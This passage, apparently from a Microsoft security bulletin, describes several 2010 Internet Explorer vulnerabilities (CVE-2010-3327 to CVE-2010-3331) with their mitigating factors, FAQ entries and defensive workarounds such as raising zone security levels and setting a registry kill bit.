Enhanced Security Configuration. Enhanced Security Configuration is a group of preconfigured settings in Internet Explorer that can reduce the likelihood of a user or administrator downloading and running specially crafted Web content on a server. This is a mitigating factor for Web sites that you have not added to the Internet Explorer Trusted sites zone. See also Managing Internet Explorer Enhanced Security Configuration.\r\n\r\nWhat does the update do? \r\nThe update addresses the vulnerability by modifying the way that Internet Explorer handles objects in memory.\r\n\r\nWhen this security bulletin was issued, had this vulnerability been publicly disclosed? \r\nNo. Microsoft received information about this vulnerability through coordinated vulnerability disclosure.\r\n\r\nWhen this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited? \r\nNo. Microsoft had not received any information to indicate that this vulnerability had been publicly used to attack customers when this security bulletin was originally issued.\r\nTop of sectionTop of section\r\nTop of sectionTop of section\r\n\t\r\nAnchor Element Information Disclosure Vulnerability - CVE-2010-3327\r\n\r\nAn information disclosure vulnerability exists in the way that Internet Explorer improperly handles the Anchor element. This behavior occurs during user operation when the Anchor element is not removed during content pasting and editing, potentially revealing personally identifiable information intended for deletion.\r\n\r\nTo view this vulnerability as a standard entry in the Common Vulnerabilities and Exposures list, see CVE-2010-3327.\r\n\t\r\nMitigating Factors for Anchor Element Information Disclosure Vulnerability - CVE-2010-3327\r\n\r\nMicrosoft has not identified any mitigating factors for this vulnerability.\r\nTop of sectionTop of section\r\n\t\r\nWorkarounds for Anchor Element Information Disclosure Vulnerability - CVE-2010-3327\r\n\r\nMicrosoft has not identified any workarounds for this vulnerability.\r\nTop of sectionTop of section\r\n\t\r\nFAQ for Anchor Element Information Disclosure Vulnerability - CVE-2010-3327\r\n\r\nWhat is the scope of the vulnerability? \r\nThis is an information disclosure vulnerability. Potentially deleted information will remain in HTML content.\r\n\r\nWhat causes the vulnerability? \r\nDuring specific user operation, the Anchor element is not removed from the editable HTML element.\r\n\r\nHow could an attacker exploit the vulnerability? \r\nThis issue is not an exploitable vulnerability. Instead, it potentially exposes previously deleted content during user operation.\r\n\r\nWhat systems are primarily at risk from the vulnerability? \r\nThis vulnerability requires that a user be logged on and utilizing the browser for HTML content creation. Therefore, any systems where Internet Explorer is used frequently, such as workstations or terminal servers, are at the most risk from this vulnerability.\r\n\r\nWhat does the update do? \r\nThe update addresses the vulnerability by modifying the way that Internet Explorer handles the Anchor element.\r\n\r\nWhen this security bulletin was issued, had this vulnerability been publicly disclosed? \r\nNo. Microsoft received information about this vulnerability through coordinated vulnerability disclosure.\r\n\r\nWhen this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited? \r\nNo. Microsoft had not received any information to indicate that this vulnerability had been publicly used to attack customers when this security bulletin was originally issued.\r\nTop of sectionTop of section\r\nTop of sectionTop of section\r\n\t\r\nUninitialized Memory Corruption Vulnerability - CVE-2010-3328\r\n\r\nA remote code execution vulnerability exists in the way that Internet Explorer accesses an object that has not been correctly initialized or has been deleted. An attacker could exploit the vulnerability by constructing a specially crafted Web page. When a user views the Web page, the vulnerability could allow remote code execution. An attacker who successfully exploited this vulnerability could gain the same user rights as the logged-on user. If a user is logged on with administrative user rights, an attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\r\n\r\nTo view this vulnerability as a standard entry in the Common Vulnerabilities and Exposures list, see CVE-2010-3328.\r\n\t\r\nMitigating Factors for Uninitialized Memory Corruption Vulnerability - CVE-2010-3328\r\n\r\nMitigation refers to a setting, common configuration, or general best-practice, existing in a default state, that could reduce the severity of exploitation of a vulnerability. The following mitigating factors may be helpful in your situation:\r\n\u2022\t\r\n\r\nIn a Web-based attack scenario, an attacker could host a Web site that contains a Web page that is used to exploit this vulnerability. In addition, compromised Web sites and Web sites that accept or host user-provided content or advertisements could contain specially crafted content that could exploit this vulnerability. In all cases, however, an attacker would have no way to force users to visit these Web sites. Instead, an attacker would have to convince users to visit the Web site, typically by getting them to click a link in an e-mail message or Instant Messenger message that takes users to the attacker's Web site.\r\n\u2022\t\r\n\r\nAn attacker who successfully exploited this vulnerability could gain the same user rights as the local user. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\r\n\u2022\t\r\n\r\nBy default, all supported versions of Microsoft Outlook, Microsoft Outlook Express, and Windows Mail open HTML e-mail messages in the Restricted sites zone, which disables script and ActiveX controls, removing the risk of an attacker being able to use this vulnerability to execute malicious code. If a user clicks a link in an e-mail message, the user could still be vulnerable to exploitation of this vulnerability through the Web-based attack scenario.\r\n\u2022\t\r\n\r\nBy default, Internet Explorer on Windows Server 2003 and Windows Server 2008 runs in a restricted mode that is known as Enhanced Security Configuration. This mode sets the security level for the Internet zone to High. This is a mitigating factor for Web sites that you have not added to the Internet Explorer Trusted sites zone. See the FAQ subsection of this vulnerability section for more information about Internet Explorer Enhanced Security Configuration.\r\nTop of sectionTop of section\r\n\t\r\nWorkarounds for Uninitialized Memory Corruption Vulnerability - CVE-2010-3328\r\n\r\nWorkaround refers to a setting or configuration change that does not correct the underlying vulnerability but would help block known attack vectors before you apply the update. Microsoft has tested the following workarounds and states in the discussion whether a workaround reduces functionality:\r\n\u2022\t\r\n\r\nSet Internet and Local intranet security zone settings to "High" to block ActiveX Controls and Active Scripting in these zones\r\n\r\nYou can help protect against exploitation of this vulnerability by changing your settings for the Internet security zone to block ActiveX controls and Active Scripting. You can do this by setting your browser security to High.\r\n\r\nTo raise the browsing security level in Internet Explorer, follow these steps:\r\n\r\n1.\r\n\t\r\n\r\nOn the Internet Explorer Tools menu, click Internet Options.\r\n\r\n2.\r\n\t\r\n\r\nIn the Internet Options dialog box, click the Security tab, and then click the Internet icon.\r\n\r\n3.\r\n\t\r\n\r\nUnder Security level for this zone, move the slider to High. This sets the security level for all Web sites you visit to High.\r\n\r\nNote If no slider is visible, click Default Level, and then move the slider to High.\r\n\r\nNote Setting the level to High may cause some Web sites to work incorrectly. If you have difficulty using a Web site after you change this setting, and you are sure the site is safe to use, you can add that site to your list of trusted sites. This will allow the site to work correctly even with the security setting set to High.\r\n\r\nImpact of workaround. There are side effects to blocking ActiveX Controls and Active Scripting. Many Web sites that are on the Internet or on an intranet use ActiveX or Active Scripting to provide additional functionality. For example, an online e-commerce site or banking site may use ActiveX Controls to provide menus, ordering forms, or even account statements. Blocking ActiveX Controls or Active Scripting is a global setting that affects all Internet and intranet sites. If you do not want to block ActiveX Controls or Active Scripting for such sites, use the steps outlined in "Add sites that you trust to the Internet Explorer Trusted sites zone".\r\n\r\nAdd sites that you trust to the Internet Explorer Trusted sites zone\r\n\r\nAfter you set Internet Explorer to block ActiveX controls and Active Scripting in the Internet zone and in the Local intranet zone, you can add sites that you trust to the Internet Explorer Trusted sites zone. This will allow you to continue to use trusted Web sites exactly as you do today, while helping to protect yourself from this attack on untrusted sites. We recommend that you add only sites that you trust to the Trusted sites zone.\r\n\r\nTo do this, follow these steps:\r\n\r\n1.\r\n\t\r\n\r\nIn Internet Explorer, click Tools, click Internet Options, and then click the Security tab.\r\n\r\n2.\r\n\t\r\n\r\nIn the Select a Web content zone to specify its current security settings box, click Trusted Sites, and then click Sites.\r\n\r\n3.\r\n\t\r\n\r\nIf you want to add sites that do not require an encrypted channel, click to clear the Require server verification (https:) for all sites in this zone check box.\r\n\r\n4.\r\n\t\r\n\r\nIn the Add this Web site to the zone box, type the URL of a site that you trust, and then click Add.\r\n\r\n5.\r\n\t\r\n\r\nRepeat these steps for each site that you want to add to the zone.\r\n\r\n6.\r\n\t\r\n\r\nClick OK two times to accept the changes and return to Internet Explorer.\r\n\r\nNote Add any sites that you trust not to take malicious action on your system. Two in particular that you may want to add are *.windowsupdate.microsoft.com and *.update.microsoft.com. These are the sites that will host the update, and it requires an ActiveX Control to install the update.\r\n\u2022\t\r\n\r\nConfigure Internet Explorer to prompt before running Active Scripting or to disable Active Scripting in the Internet and Local intranet security zone\r\n\r\nYou can help protect against exploitation of this vulnerability by changing your settings to prompt before running Active Scripting or to disable Active Scripting in the Internet and Local intranet security zone. To do this, follow these steps:\r\n\r\n1.\r\n\t\r\n\r\nIn Internet Explorer, click Internet Options on the Tools menu.\r\n\r\n2.\r\n\t\r\n\r\nClick the Security tab.\r\n\r\n3.\r\n\t\r\n\r\nClick Internet, and then click Custom Level.\r\n\r\n4.\r\n\t\r\n\r\nUnder Settings, in the Scripting section, under Active Scripting, click Prompt or Disable, and then click OK.\r\n\r\n5.\r\n\t\r\n\r\nClick Local intranet, and then click Custom Level.\r\n\r\n6.\r\n\t\r\n\r\nUnder Settings, in the Scripting section, under Active Scripting, click Prompt or Disable, and then click OK.\r\n\r\n7.\r\n\t\r\n\r\nClick OK two times to return to Internet Explorer.\r\n\r\nNote Disabling Active Scripting in the Internet and Local intranet security zones may cause some Web sites to work incorrectly. If you have difficulty using a Web site after you change this setting, and you are sure the site is safe to use, you can add that site to your list of trusted sites. This will allow the site to work correctly.\r\n\r\nImpact of workaround. There are side effects to prompting before running Active Scripting. Many Web sites that are on the Internet or on an intranet use Active Scripting to provide additional functionality. For example, an online e-commerce site or banking site may use Active Scripting to provide menus, ordering forms, or even account statements. Prompting before running Active Scripting is a global setting that affects all Internet and intranet sites. You will be prompted frequently when you enable this workaround. For each prompt, if you feel you trust the site that you are visiting, click Yes to run Active Scripting. If you do not want to be prompted for all these sites, use the steps outlined in "Add sites that you trust to the Internet Explorer Trusted sites zone".\r\n\r\nAdd sites that you trust to the Internet Explorer Trusted sites zone\r\n\r\nAfter you set Internet Explorer to require a prompt before it runs ActiveX controls and Active Scripting in the Internet zone and in the Local intranet zone, you can add sites that you trust to the Internet Explorer Trusted sites zone. This will allow you to continue to use trusted Web sites exactly as you do today, while helping to protect you from this attack on untrusted sites. We recommend that you add only sites that you trust to the Trusted sites zone.\r\n\r\nTo do this, follow these steps:\r\n\r\n1.\r\n\t\r\n\r\nIn Internet Explorer, click Tools, click Internet Options, and then click the Security tab.\r\n\r\n2.\r\n\t\r\n\r\nIn the Select a Web content zone to specify its current security settings box, click Trusted Sites, and then click Sites.\r\n\r\n3.\r\n\t\r\n\r\nIf you want to add sites that do not require an encrypted channel, click to clear the Require server verification (https:) for all sites in this zone check box.\r\n\r\n4.\r\n\t\r\n\r\nIn the Add this Web site to the zone box, type the URL of a site that you trust, and then click Add.\r\n\r\n5.\r\n\t\r\n\r\nRepeat these steps for each site that you want to add to the zone.\r\n\r\n6.\r\n\t\r\n\r\nClick OK two times to accept the changes and return to Internet Explorer.\r\n\r\nNote Add any sites that you trust not to take malicious action on your system. Two in particular that you may want to add are *.windowsupdate.microsoft.com and *.update.microsoft.com. These are the sites that will host the update, and it requires an ActiveX Control to install the update.\r\nTop of sectionTop of section\r\n\t\r\nFAQ for Uninitialized Memory Corruption Vulnerability - CVE-2010-3328\r\n\r\nWhat is the scope of the vulnerability? \r\nThis is a remote code execution vulnerability. An attacker who successfully exploited this vulnerability could gain the same user rights as the logged-on user. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\r\n\r\nWhat causes the vulnerability? \r\nWhen Internet Explorer attempts to access an object that has not been initialized or has been deleted, it may corrupt memory in such a way that an attacker could execute arbitrary code in the context of the logged-on user.\r\n\r\nWhat might an attacker use the vulnerability to do? \r\nAn attacker who successfully exploited this vulnerability could gain the same user rights as a logged-on user. If the user is logged on with administrative user rights, an attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\r\n\r\nHow could an attacker exploit the vulnerability? \r\nAn attacker could host a specially crafted Web site that is designed to exploit this vulnerability through Internet Explorer and then convince a user to view the Web site. An attacker could also embed an ActiveX control marked "safe for initialization" in an application or Microsoft Office document that hosts the IE rendering engine. The attacker could also take advantage of compromised Web sites and Web sites that accept or host user-provided content or advertisements. These Web sites could contain specially crafted content that could exploit this vulnerability. In all cases, however, an attacker would have no way to force users to view the attacker-controlled content. Instead, an attacker would have to convince users to take action, typically by clicking a link in an e-mail message or in an Instant Messenger message that takes users to the attacker's Web site, or by opening an attachment sent through e-mail.\r\n\r\nWhat systems are primarily at risk from the vulnerability? \r\nThis vulnerability requires that a user be logged on and visiting a Web site for any malicious action to occur. Therefore, any systems where Internet Explorer is used frequently, such as workstations or terminal servers, are at the most risk from this vulnerability.\r\n\r\nI am running Internet Explorer for Windows Server 2003 or Windows Server 2008. Does this mitigate this vulnerability? \r\nYes. By default, Internet Explorer on Windows Server 2003 and Windows Server 2008 runs in a restricted mode that is known as Enhanced Security Configuration. Enhanced Security Configuration is a group of preconfigured settings in Internet Explorer that can reduce the likelihood of a user or administrator downloading and running specially crafted Web content on a server. This is a mitigating factor for Web sites that you have not added to the Internet Explorer Trusted sites zone. See also Managing Internet Explorer Enhanced Security Configuration.\r\n\r\nWhat does the update do? \r\nThe update addresses the vulnerability by modifying the way that Internet Explorer handles objects in memory.\r\n\r\nWhen this security bulletin was issued, had this vulnerability been publicly disclosed? \r\nNo. Microsoft received information about this vulnerability through coordinated vulnerability disclosure.\r\n\r\nWhen this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited? \r\nNo. Microsoft had not received any information to indicate that this vulnerability had been publicly used to attack customers when this security bulletin was originally issued.\r\nTop of sectionTop of section\r\nTop of sectionTop of section\r\n\t\r\nUninitialized Memory Corruption Vulnerability - CVE-2010-3329\r\n\r\nA remote code execution vulnerability exists in the way that Internet Explorer accesses an object that has not been correctly initialized or has been deleted when a document in an HTML format is opened in Microsoft Word. An attacker could exploit the vulnerability by convincing the user to open a malicious Word document. When a user closes the document, the vulnerability could allow remote code execution. An attacker who successfully exploited this vulnerability could gain the same user rights as the logged-on user. If a user is logged on with administrative user rights, an attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\r\n\r\nTo view this vulnerability as a standard entry in the Common Vulnerabilities and Exposures list, see CVE-2010-3329.\r\n\t\r\nMitigating Factors for Uninitialized Memory Corruption Vulnerability - CVE-2010-3329\r\n\r\nMitigation refers to a setting, common configuration, or general best-practice, existing in a default state, that could reduce the severity of exploitation of a vulnerability. The following mitigating factors may be helpful in your situation:\r\n\u2022\t\r\n\r\nThe vulnerability cannot be exploited automatically through e-mail. For an attack to be successful, a user must open an attachment that is sent in an e-mail message.\r\n\u2022\t\r\n\r\nAn attacker who successfully exploited this vulnerability could gain the same user rights as the local user. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\r\nTop of sectionTop of section\r\n\t\r\nWorkarounds for Uninitialized Memory Corruption Vulnerability - CVE-2010-3329\r\n\r\nWorkaround refers to a setting or configuration change that does not correct the underlying vulnerability but would help block known attack vectors before you apply the update. Microsoft has tested the following workarounds and states in the discussion whether a workaround reduces functionality:\r\n\u2022\t\r\n\r\nPrevent COM objects from running in Internet Explorer\r\n\r\nYou can disable attempts to instantiate a HtmlDlgHelper Class COM object in Internet Explorer by setting the kill bit for the control in the registry.\r\n\r\nWarning If you use Registry Editor incorrectly, you may cause serious problems that may require you to reinstall your operating system. Microsoft cannot guarantee that you can solve problems that result from using Registry Editor incorrectly. Use Registry Editor at your own risk.\r\n\r\nFor detailed steps that you can use to prevent a control from running in Internet Explorer, see Microsoft Knowledge Base Article 240797. Follow the steps in this article to create a Compatibility Flags value in the registry to prevent a COM object from being instantiated in Internet Explorer.\r\n\r\nTo set the kill bit for a CLSID with a value of {3050f4e1-98b5-11cf-bb82-00aa00bdce0b}, paste the following text in a text editor such as Notepad. Then, save the file by using the .reg file name extension.\r\n\r\nWindows Registry Editor Version 5.00\r\n[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{3050f4e1-98b5-11cf-bb82-00aa00bdce0b}]\r\n"Compatibility Flags"=dword:00000400\r\n\r\nYou can apply this .reg file to individual systems by double-clicking it. You can also apply it across domains by using Group Policy. For more information about Group Policy, visit the following Microsoft Web sites:\r\n\u2022\t\r\n\r\nGroup Policy collection\r\n\u2022\t\r\n\r\nWhat is Group Policy Object Editor?\r\n\u2022\t\r\n\r\nCore Group Policy tools and settings\r\n\r\nNote You must restart Internet Explorer for your changes to take effect.\r\n\r\nImpact of Workaround. There is no impact as long as the object is not intended to be used in Internet Explorer.\r\n\r\nHow to undo the workaround. Delete the registry keys previously added in implementing this workaround.\r\nTop of sectionTop of section\r\n\t\r\nFAQ for Uninitialized Memory Corruption Vulnerability - CVE-2010-3329\r\n\r\nWhat is the scope of the vulnerability? \r\nThis is a remote code execution vulnerability. An attacker who successfully exploited this vulnerability could gain the same user rights as the logged-on user. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\r\n\r\nWhat causes the vulnerability? \r\nWhen Internet Explorer attempts to access an object that has not been initialized or has been deleted when Microsoft Word has been closed, it may corrupt memory in such a way that an attacker could execute arbitrary code in the context of the logged-on user.\r\n\r\nWhat might an attacker use the vulnerability to do? \r\nAn attacker who successfully exploited this vulnerability could gain the same user rights as a logged-on user. If the user is logged on with administrative user rights, an attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\r\n\r\nHow could an attacker exploit the vulnerability? \r\nAn attacker can send a user a specially crafted Word document that is designed to exploit this vulnerability through Microsoft Word and convince the user to view the Word document. In all cases, however, an attacker would have no way to force users to view the attacker-controlled content. Instead, an attacker would have to convince users to take action, typically by clicking a link in an e-mail message or in an Instant Messenger message that takes users to the attacker's Web site, or by opening an attachment sent through e-mail. This issue cannot be exploited directly through Internet Explorer.\r\n\r\nWhat systems are primarily at risk from the vulnerability? \r\nThis vulnerability requires that a user be logged on and open a malicious Word document for any malicious action to occur. Therefore, any systems where Microsoft Word is used frequently, such as workstations or terminal servers, are at the most risk from this vulnerability.\r\n\r\nWhat does the update do? \r\nThe update addresses the vulnerability by modifying the way that Internet Explorer handles objects in memory.\r\n\r\nWhen this security bulletin was issued, had this vulnerability been publicly disclosed? \r\nNo. Microsoft received information about this vulnerability through coordinated vulnerability disclosure.\r\n\r\nWhen this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited? \r\nNo. Microsoft had not received any information to indicate that this vulnerability had been publicly used to attack customers when this security bulletin was originally issued.\r\nTop of sectionTop of section\r\nTop of sectionTop of section\r\n\t\r\nCross-Domain Information Disclosure Vulnerability - CVE-2010-3330\r\n\r\nAn information disclosure vulnerability exists in Internet Explorer that could allow script to gain access to information in another domain or Internet Explorer zone. An attacker could exploit the vulnerability by constructing a specially crafted Web page that could allow information disclosure if a user viewed the Web page. An attacker who successfully exploited this vulnerability could view content from another domain or Internet Explorer zone.\r\n\r\nTo view this vulnerability as a standard entry in the Common Vulnerabilities and Exposures list, see CVE-2010-3330.\r\n\t\r\nMitigating Factors for Cross-Domain Information Disclosure Vulnerability - CVE-2010-3330\r\n\r\nMitigation refers to a setting, common configuration, or general best-practice, existing in a default state, that could reduce the severity of exploitation of a vulnerability. The following mitigating factors may be helpful in your situation:\r\n\u2022\t\r\n\r\nBy default, Internet Explorer on Windows Server 2003 and Windows Server 2008 runs in a restricted mode that is known as Enhanced Security Configuration. This mode sets the security level for the Internet zone to High. This is a mitigating factor for Web sites that you have not added to the Internet Explorer Trusted sites zone. See the FAQ subsection of this vulnerability section for more information about Internet Explorer Enhanced Security Configuration.\r\n\u2022\t\r\n\r\nIn a Web-based attack scenario, an attacker could host a Web site that contains a Web page that is used to exploit this vulnerability. In addition, compromised Web sites and Web sites that accept or host user-provided content or advertisements could contain specially crafted content that could exploit this vulnerability. In all cases, however, an attacker would have no way to force users to visit these Web sites. Instead, an attacker would have to convince users to visit the Web site, typically by getting them to click a link in an e-mail message or Instant Messenger message that takes users to the attacker's Web site.\r\nTop of sectionTop of section\r\n\t\r\nWorkarounds for Cross-Domain Information Disclosure Vulnerability - CVE-2010-3330\r\n\r\nWorkaround refers to a setting or configuration change that does not correct the underlying vulnerability but would help block known attack vectors before you apply the update. Microsoft has tested the following workarounds and states in the discussion whether a workaround reduces functionality:\r\n\u2022\t\r\n\r\nRead e-mails in plain text\r\n\r\nTo help protect yourself from the e-mail attack vector, read e-mail messages in plain text format.\r\n\r\nMicrosoft Office Outlook 2002 users who have applied Office XP Service Pack 1 or a later version and Microsoft Office Outlook Express 6 users who have applied Internet Explorer 6 Service Pack 1 or a later version can enable this setting and view e-mail messages that are not digitally signed or e-mail messages that are not encrypted in plain text only.\r\n\r\nDigitally signed e-mail messages or encrypted e-mail messages are not affected by the setting and may be read in their original formats. For more information about how to enable this setting in Outlook 2002, see Microsoft Knowledge Base Article 307594.\r\n\r\nFor information about this setting in Outlook Express 6, see Microsoft Knowledge Base Article 291387.\r\n\r\nImpact of workaround. E-mail messages that are viewed in plain text format will not contain pictures, specialized fonts, animations, or other rich content. Additionally:\r\n\u2022\t\r\n\r\nThe changes are applied to the preview pane and to open messages.\r\n\u2022\t\r\n\r\nPictures become attachments so that they are not lost.\r\n\u2022\t\r\n\r\nBecause the message is still in Rich Text or HTML format in the store, the object model (custom code solutions) may behave unexpectedly.\r\n\u2022\t\r\n\r\nSet Internet and Local intranet security zone settings to "High" to block ActiveX Controls and Active Scripting in these zones\r\n\r\nYou can help protect against exploitation of this vulnerability by changing your settings for the Internet security zone to block ActiveX controls and Active Scripting. You can do this by setting your browser security to High.\r\n\r\nTo raise the browsing security level in Internet Explorer, follow these steps:\r\n\r\n1.\r\n\t\r\n\r\nOn the Internet Explorer Tools menu, click Internet Options.\r\n\r\n2.\r\n\t\r\n\r\nIn the Internet Options dialog box, click the Security tab, and then click the Internet icon.\r\n\r\n3.\r\n\t\r\n\r\nUnder Security level for this zone, move the slider to High. This sets the security level for all Web sites you visit to High.\r\n\r\nNote If no slider is visible, click Default Level, and then move the slider to High.\r\n\r\nNote Setting the level to High may cause some Web sites to work incorrectly. If you have difficulty using a Web site after you change this setting, and you are sure the site is safe to use, you can add that site to your list of trusted sites. This will allow the site to work correctly even with the security setting set to High.\r\n\r\nImpact of workaround. There are side effects to blocking ActiveX Controls and Active Scripting. Many Web sites that are on the Internet or on an intranet use ActiveX or Active Scripting to provide additional functionality. For example, an online e-commerce site or banking site may use ActiveX Controls to provide menus, ordering forms, or even account statements. Blocking ActiveX Controls or Active Scripting is a global setting that affects all Internet and intranet sites. If you do not want to block ActiveX Controls or Active Scripting for such sites, use the steps outlined in "Add sites that you trust to the Internet Explorer Trusted sites zone".\r\n\r\nAdd sites that you trust to the Internet Explorer Trusted sites zone\r\n\r\nAfter you set Internet Explorer to block ActiveX controls and Active Scripting in the Internet zone and in the Local intranet zone, you can add sites that you trust to the Internet Explorer Trusted sites zone. This will allow you to continue to use trusted Web sites exactly as you do today, while helping to protect yourself from this attack on untrusted sites. We recommend that you add only sites that you trust to the Trusted sites zone.\r\n\r\nTo do this, follow these steps:\r\n\r\n1.\r\n\t\r\n\r\nIn Internet Explorer, click Tools, click Internet Options, and then click the Security tab.\r\n\r\n2.\r\n\t\r\n\r\nIn the Select a Web content zone to specify its current security settings box, click Trusted Sites, and then click Sites.\r\n\r\n3.\r\n\t\r\n\r\nIf you want to add sites that do not require an encrypted channel, click to clear the Require server verification (https:) for all sites in this zone check box.\r\n\r\n4.\r\n\t\r\n\r\nIn the Add this Web site to the zone box, type the URL of a site that you trust, and then click Add.\r\n\r\n5.\r\n\t\r\n\r\nRepeat these steps for each site that you want to add to the zone.\r\n\r\n6.\r\n\t\r\n\r\nClick OK two times to accept the changes and return to Internet Explorer.\r\n\r\nNote Add any sites that you trust not to take malicious action on your system. Two in particular that you may want to add are *.windowsupdate.microsoft.com and *.update.microsoft.com. These are the sites that will host the update, and it requires an ActiveX Control to install the update.\r\n\u2022\t\r\n\r\nConfigure Internet Explorer to prompt before running Active Scripting or to disable Active Scripting in the Internet and Local intranet security zone\r\n\r\nYou can help protect against exploitation of this vulnerability by changing your settings to prompt before running Active Scripting or to disable Active Scripting in the Internet and Local intranet security zone. To do this, follow these steps:\r\n\r\n1.\r\n\t\r\n\r\nIn Internet Explorer, click Internet Options on the Tools menu.\r\n\r\n2.\r\n\t\r\n\r\nClick the Security tab.\r\n\r\n3.\r\n\t\r\n\r\nClick Internet, and then click Custom Level.\r\n\r\n4.\r\n\t\r\n\r\nUnder Settings, in the Scripting section, under Active Scripting, click Prompt or Disable, and then click OK.\r\n\r\n5.\r\n\t\r\n\r\nClick Local intranet, and then click Custom Level.\r\n\r\n6.\r\n\t\r\n\r\nUnder Settings, in the Scripting section, under Active Scripting, click Prompt or Disable, and then click OK.\r\n\r\n7.\r\n\t\r\n\r\nClick OK two times to return to Internet Explorer.\r\n\r\nNote Disabling Active Scripting in the Internet and Local intranet security zones may cause some Web sites to work incorrectly. If you have difficulty using a Web site after you change this setting, and you are sure the site is safe to use, you can add that site to your list of trusted sites. This will allow the site to work correctly.\r\n\r\nImpact of workaround. There are side effects to prompting before running Active Scripting. Many Web sites that are on the Internet or on an intranet use Active Scripting to provide additional functionality. For example, an online e-commerce site or banking site may use Active Scripting to provide menus, ordering forms, or even account statements. Prompting before running Active Scripting is a global setting that affects all Internet and intranet sites. You will be prompted frequently when you enable this workaround. For each prompt, if you feel you trust the site that you are visiting, click Yes to run Active Scripting. If you do not want to be prompted for all these sites, use the steps outlined in "Add sites that you trust to the Internet Explorer Trusted sites zone".\r\n\r\nAdd sites that you trust to the Internet Explorer Trusted sites zone\r\n\r\nAfter you set Internet Explorer to require a prompt before it runs ActiveX controls and Active Scripting in the Internet zone and in the Local intranet zone, you can add sites that you trust to the Internet Explorer Trusted sites zone. This will allow you to continue to use trusted Web sites exactly as you do today, while helping to protect you from this attack on untrusted sites. We recommend that you add only sites that you trust to the Trusted sites zone.\r\n\r\nTo do this, follow these steps:\r\n\r\n1.\r\n\t\r\n\r\nIn Internet Explorer, click Tools, click Internet Options, and then click the Security tab.\r\n\r\n2.\r\n\t\r\n\r\nIn the Select a Web content zone to specify its current security settings box, click Trusted Sites, and then click Sites.\r\n\r\n3.\r\n\t\r\n\r\nIf you want to add sites that do not require an encrypted channel, click to clear the Require server verification (https:) for all sites in this zone check box.\r\n\r\n4.\r\n\t\r\n\r\nIn the Add this Web site to the zone box, type the URL of a site that you trust, and then click Add.\r\n\r\n5.\r\n\t\r\n\r\nRepeat these steps for each site that you want to add to the zone.\r\n\r\n6.\r\n\t\r\n\r\nClick OK two times to accept the changes and return to Internet Explorer.\r\n\r\nNote Add any sites that you trust not to take malicious action on your system. Two in particular that you may want to add are *.windowsupdate.microsoft.com and *.update.microsoft.com. These are the sites that will host the update, and it requires an ActiveX Control to install the update.\r\nTop of sectionTop of section\r\n\t\r\nFAQ for Cross-Domain Information Disclosure Vulnerability - CVE-2010-3330\r\n\r\nWhat is the scope of the vulnerability? \r\nThis is an information disclosure vulnerability. An attacker who exploited the vulnerability when a user views a Web page could view content from a different domain or Internet Explorer zone other than the domain or zone of the attacker's Web page.\r\n\r\nWhat causes the vulnerability? \r\nDuring certain processes, Internet Explorer incorrectly allows scripts to access and read content from different domains.\r\n\r\nWhat might an attacker use the vulnerability to do? \r\nAn attacker who successfully exploited this vulnerability could view content from another domain or Internet Explorer zone.\r\n\r\nHow could an attacker exploit the vulnerability? \r\nAn attacker could host a specially crafted Web site that is designed to exploit this vulnerability through Internet Explorer and then convince a user to view the Web site. The attacker could also take advantage of compromised Web sites and Web sites that accept or host user-provided content or advertisements. These Web sites could contain specially crafted content that could exploit this vulnerability. In all cases, however, an attacker would have no way to force users to visit these Web sites. Instead, an attacker would have to convince users to visit the Web site, typically by getting them to click a link in an e-mail message or in an Instant Messenger message that takes users to the attacker's Web site. It could also be possible to display specially crafted Web content by using banner advertisements or by using other methods to deliver Web content to affected systems.\r\n\r\nWhat systems are primarily at risk from the vulnerability? \r\nThis vulnerability requires that a user be logged on and visiting a Web site for any malicious action to occur. Therefore, any systems where Internet Explorer is used frequently, such as workstations or terminal servers, are at the most risk from this vulnerability.\r\n\r\nI am running Internet Explorer for Windows Server 2003 or Windows Server 2008. Does this mitigate this vulnerability? \r\nYes. By default, Internet Explorer on Windows Server 2003 and Windows Server 2008 runs in a restricted mode that is known as Enhanced Security Configuration. Enhanced Security Configuration is a group of preconfigured settings in Internet Explorer that can reduce the likelihood of a user or administrator downloading and running specially crafted Web content on a server. This is a mitigating factor for Web sites that you have not added to the Internet Explorer Trusted sites zone. See also Managing Internet Explorer Enhanced Security Configuration.\r\n\r\nWhat does the update do? \r\nThe update addresses the vulnerability by modifying the way that Internet Explorer handles script during certain processes.\r\n\r\nWhen this security bulletin was issued, had this vulnerability been publicly disclosed? \r\nNo. Microsoft received information about this vulnerability through coordinated vulnerability disclosure.\r\n\r\nWhen this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited? \r\nNo. Microsoft had not received any information to indicate that this vulnerability had been publicly used to attack customers when this security bulletin was originally issued.\r\nTop of sectionTop of section\r\nTop of sectionTop of section\r\n\t\r\nUninitialized Memory Corruption Vulnerability - CVE-2010-3331\r\n\r\nA remote code execution vulnerability exists in the way that Internet Explorer accesses an object that has not been correctly initialized or has been deleted. An attacker could exploit the vulnerability by convincing a user to view a specially crafted Word document. When a user closes the Word document, the vulnerability could allow remote code execution. An attacker who successfully exploited this vulnerability could gain the same user rights as the logged-on user. If a user is logged on with administrative user rights, an attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\r\n\r\nTo view this vulnerability as a standard entry in the Common Vulnerabilities and Exposures list, see CVE-2010-3331.\r\n\t\r\nMitigating Factors for Uninitialized Memory Corruption Vulnerability - CVE-2010-3331\r\n\r\nMitigation refers to a setting, common configuration, or general best-practice, existing in a default state, that could reduce the severity of exploitation of a vulnerability. The following mitigating factors may be helpful in your situation:\r\n\u2022\t\r\n\r\nThe vulnerability cannot be exploited automatically 